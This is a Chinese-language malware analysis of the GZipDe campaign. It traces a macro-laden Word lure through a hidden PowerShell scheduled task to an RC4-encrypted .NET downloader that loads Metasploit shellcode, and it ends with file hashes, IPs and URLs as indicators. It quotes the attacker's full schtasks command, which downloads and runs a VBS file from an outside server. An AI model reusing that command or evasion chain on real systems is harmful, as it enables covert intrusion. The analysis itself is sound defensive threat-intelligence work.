GZipDe惡意軟體分析
今年5月底,Middle Eastern新聞網發布了一篇關於下一屆上合峰會的文章。1周後,AlienVault實驗室就檢測到了攻擊該區域的惡意文檔,惡意文檔使用了一部分原文內容作為誘餌,如下圖所示:
GZipDe惡意文檔示例
這是多階段感染的第一步。雖然最終的目的看起來是安裝一個Metasploit後門,但研究人員發現了一個.NET下載器,該下載器使用傳統的加密方法來混淆進程內存並避免反病毒軟體的檢測。
惡意文檔
該文件被一個Afghanistan的用戶上傳到VirusTotal,該文件含有宏的惡意軟體嵌入到微軟word文檔中。一旦文檔打開,就會執行一個VB腳本,並在隱藏的Powershell控制台中執行新的任務:
"C:WindowsSystem32schtasks.exe" /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\"http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\",\"$env:publicsvchost325.vbs\");(New-Object -com Shell.Application).ShellExecute(\"$env:publicsvchost325.vbs\");" /F
利用HTTP請求,可以解析下面的URL:
http://118.193.251[.]137/dropbox/?p=BT67HU78HZ
因為伺服器已經下線了,所以沒能看到感染鏈的下一步。
基於傳統路徑的分析,研究人員認為該文件與後面的感染步驟相關:
http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe.
GZipDe:加密下載器
惡意軟體的內部名叫做Gzipde,這在攻擊者機器中的路徑中可以看到:
DocumentsVisual Studio 2008ProjectsgzipdegzipdeobjDebuggzipde.pdb
雖然攻擊者在本版本中加入了額外的加密payload層,但研究人員還是發現了原始的逆向TCP payload是公布在Github上的。該payload中含有一個Base64的字元串GZipDe,使用zip壓縮和對稱加密演算法加密來繞過反病毒軟體檢測。
GZipDe密鑰是一個數組,如下所示:
GZipDe密鑰
解壓後,payload就會被傳遞給解密器。解密方法是23位元組密鑰長度的RC4方法。
GZipDe解密器
惡意軟體會分配新的有讀、寫、執行許可權的內存頁。然後把解密的payload的內容複製並載入到新的線程,並執行。
腳本使用WaitForSingleObject C#類,也就是說程序訪問了一個mutex對象。一個特殊的handler控制著進程對系統資源的訪問。這可以防止惡意軟體的多個實例同時運行,增加系統資源利用率併產生更多的網路雜訊。
GZipDe腳本判斷mutex對象
Payload中含有聯繫伺服器175.194.42[.]8的shellcode。當伺服器下線時,Shodan記錄到它服務一個Metasploit payload:
Metasploit已經變成目標攻擊的一個流行的選擇。
Metasploit payload
伺服器175.194.42[.]8會分發一個Metasploit payload,含有繞過系統檢測到shellocde和Meterpreter payload(實際上是一個後門)。比如,可以從系統收集信息,聯繫C2伺服器來接收命令。
Shellcode會載入整個DLL到內存中,所以可以在不向硬碟寫入信息的情況下運作,這也叫做Reflective DLL injection(反射型DLL注入)。從這點看,攻擊者可以傳輸任意的payload來獲取許可權提升。
附錄
文件哈希:
https://otx.alienvault.com/indicator/file/faf003c38758cf70b12bc4899714833e4713096c8f66163e753b3f0e70f2ba28
https://otx.alienvault.com/indicator/file/148d280586de3a62d366c396c8bfedd6683a2e3eb1c3d956da57dbfc19d1983c
https://otx.alienvault.com/indicator/file/3932999be863d5844168e3bbb09ffc2f8d572a8f4a93946adb7e9c438f35c711
IP地址:
118.193.251[.]137
175.194.42[.]8
URLs:
http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe
http://118.193.251[.]137/dropbox/?p=BT67HU78HZ
TAG:嘶吼RoarTalk |